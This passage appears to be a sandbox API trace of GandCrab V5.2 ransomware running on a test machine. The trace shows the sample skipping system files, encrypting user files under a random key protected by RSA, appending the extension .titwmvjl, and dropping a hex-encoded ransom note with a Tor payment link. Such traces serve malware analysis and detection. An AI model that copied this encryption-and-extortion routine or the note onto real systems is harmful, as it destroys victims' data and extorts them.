lpString2="ContentStore.xml" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" [0073.300] lstrlenW (lpString=".titwmvjl") returned 9 [0073.301] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml") returned 90 [0073.301] VirtualAlloc (lpAddress=0x0, dwSize=0xf4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.301] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.titwmvjl") returned 99 [0073.301] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml") returned 90 [0073.301] lstrlenW (lpString=".xml") returned 4 [0073.301] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.301] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".xml ") returned 5 [0073.301] lstrcmpiW (lpString1=".xml", lpString2=".titwmvjl") returned 1 [0073.301] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.301] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml") returned 90 [0073.301] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml") returned 90 [0073.301] lstrcmpiW (lpString1="ContentStore.xml", lpString2="desktop.ini") returned -1 [0073.302] lstrcmpiW (lpString1="ContentStore.xml", lpString2="autorun.inf") returned 1 [0073.302] lstrcmpiW (lpString1="ContentStore.xml", lpString2="ntuser.dat") returned -1 [0073.302] lstrcmpiW (lpString1="ContentStore.xml", lpString2="iconcache.db") returned -1 [0073.302] lstrcmpiW (lpString1="ContentStore.xml", lpString2="bootsect.bak") returned 1 [0073.302] lstrcmpiW (lpString1="ContentStore.xml", lpString2="boot.ini") returned 1 [0073.302] lstrcmpiW (lpString1="ContentStore.xml", lpString2="ntuser.dat.log") returned -1 [0073.302] lstrcmpiW (lpString1="ContentStore.xml", lpString2="thumbs.db") returned -1 [0073.302] lstrcmpiW (lpString1="ContentStore.xml", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0073.302] lstrcmpiW (lpString1="ContentStore.xml", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0073.302] lstrcmpiW (lpString1="ContentStore.xml", lpString2="KRAB-DECRYPT.html") returned -1 [0073.302] lstrcmpiW (lpString1="ContentStore.xml", lpString2="CRAB-DECRYPT.html") returned -1 [0073.302] lstrcmpiW (lpString1="ContentStore.xml", lpString2="KRAB-DECRYPT.txt") returned -1 [0073.302] lstrcmpiW (lpString1="ContentStore.xml", lpString2="CRAB-DECRYPT.txt") returned -1 [0073.302] lstrcmpiW (lpString1="ContentStore.xml", lpString2="ntldr") returned -1 [0073.302] lstrcmpiW (lpString1="ContentStore.xml", lpString2="NTDETECT.COM") returned -1 [0073.302] lstrcmpiW (lpString1="ContentStore.xml", lpString2="Bootfont.bin") returned 1 [0073.302] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml") returned 90 [0073.302] lstrlenW (lpString=".xml") returned 4 [0073.302] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.302] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".xml ") returned 5 [0073.302] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.303] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.303] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0073.303] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0073.303] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.303] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0073.304] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.304] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.304] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.304] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0073.305] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.305] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.305] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.305] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.305] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0073.306] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.306] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.306] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.306] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0073.306] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.306] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.306] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.307] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.307] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0073.307] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.307] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503638) returned 1 [0073.308] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.308] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0073.308] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.308] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0073.309] GetLastError () returned 0x0 [0073.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.309] CryptDestroyKey (hKey=0x503638) returned 1 [0073.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.309] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.309] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.309] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0073.310] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.310] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5031f8) returned 1 [0073.310] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.310] CryptGetKeyParam (in: hKey=0x5031f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0073.310] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.311] CryptEncrypt (in: hKey=0x5031f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0073.311] GetLastError () returned 0x0 [0073.311] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.311] CryptDestroyKey (hKey=0x5031f8) returned 1 [0073.311] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.311] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.311] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0073.312] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0073.312] ReadFile (in: hFile=0x2c4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ecb4*=0xa8, lpOverlapped=0x0) returned 1 [0073.325] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xffffff58, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.325] WriteFile (in: hFile=0x2c4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ec98*=0xa8, lpOverlapped=0x0) returned 1 [0073.327] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.327] WriteFile (in: hFile=0x2c4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0073.329] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.334] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.334] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.335] CloseHandle (hObject=0x2c4) returned 1 [0073.336] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml.titwmvjl"), dwFlags=0x1) returned 1 [0073.337] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.337] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.337] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0073.337] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0073.337] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\d2ca4a09d2ca4deb61a.lock" [0073.337] lstrlenW (lpString=".titwmvjl") returned 9 [0073.337] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\d2ca4a09d2ca4deb61a.lock") returned 98 [0073.337] VirtualAlloc (lpAddress=0x0, dwSize=0x104, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.338] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 107 [0073.338] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\d2ca4a09d2ca4deb61a.lock") returned 98 [0073.338] lstrlenW (lpString=".lock") returned 5 [0073.338] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.338] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0073.338] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.338] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.338] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.338] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0073.338] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0073.339] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\TITWMVJL-DECRYPT.txt" [0073.339] lstrlenW (lpString=".titwmvjl") returned 9 [0073.339] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\TITWMVJL-DECRYPT.txt") returned 94 [0073.339] VirtualAlloc (lpAddress=0x0, dwSize=0xfc, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.339] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 103 [0073.339] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\TITWMVJL-DECRYPT.txt") returned 94 [0073.339] lstrlenW (lpString=".txt") returned 4 [0073.339] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.339] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0073.339] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0073.339] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.340] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\TITWMVJL-DECRYPT.txt") returned 94 [0073.340] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\TITWMVJL-DECRYPT.txt") returned 94 [0073.340] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0073.340] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0073.340] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0073.340] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0073.340] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0073.340] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0073.340] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0073.340] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0073.340] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.340] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0073.340] FindClose (in: hFindFile=0x503838 | out: hFindFile=0x503838) returned 1 [0073.341] CloseHandle (hObject=0x2bc) returned 1 [0073.341] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0073.341] lstrcmpW (lpString1="Speech", lpString2=".") returned 1 [0073.341] lstrcmpW (lpString1="Speech", lpString2="..") returned 1 [0073.342] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Speech" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech" [0073.342] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\" [0073.342] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0073.342] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.342] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0073.342] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.342] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0073.343] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.343] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0073.343] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0073.343] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0073.343] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.343] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.343] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\\\TITWMVJL-DECRYPT.txt") returned 76 [0073.344] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Speech\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\speech\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0073.344] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x7